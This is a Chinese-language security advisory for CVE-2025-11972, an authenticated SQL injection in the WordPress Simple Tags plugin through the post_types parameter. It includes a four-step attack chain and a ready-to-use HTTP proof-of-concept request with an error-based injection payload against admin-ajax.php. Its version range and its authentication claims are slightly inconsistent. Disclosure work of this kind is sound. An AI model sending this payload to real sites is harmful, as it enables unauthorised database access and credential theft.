CVE-2025-11972 CVSS 4.9 中危

CVE-2025-11972: WordPress Simple Tags插件SQL注入漏洞

披露日期: 2025-11-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-11972

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI plugin for WordPress (Simple Tags)

漏洞概述

WordPress Simple Tags插件存在SQL注入漏洞，攻击者可通过构造恶意的post_types参数绕过安全过滤，成功注入恶意SQL语句并获取数据库敏感信息。该插件专为WordPress网站设计，用于管理标签、分类和分类法，支持AI自动标记功能。漏洞影响版本从早期版本至3.40.0，CVSS评分为4.9（中危），需要认证用户（编辑权限及以上）才能利用。

技术细节

漏洞源于post_types参数处理不当，插件未对用户输入进行充分转义和参数化查询。攻击者通过构造特定的SQL片段可绕过现有查询逻辑，实现未授权数据访问。成功利用可导致数据库信息泄露，包括用户凭证、配置数据等敏感内容。

攻击链分析

STEP 1

步骤1

获取WordPress站点编辑权限账户

STEP 2

步骤2

识别插件版本是否在3.40.0及以下

STEP 3

步骤3

通过admin-ajax.php接口注入恶意SQL语句

STEP 4

步骤4

提取数据库中的敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: [valid_session_cookie]

action=stax_tag_cloud&post_types=post' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a)-- -

影响范围

WordPress Simple Tags < 3.40.0

防御指南

临时缓解措施

立即升级插件至最新版本，或暂时禁用Simple Tags插件

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表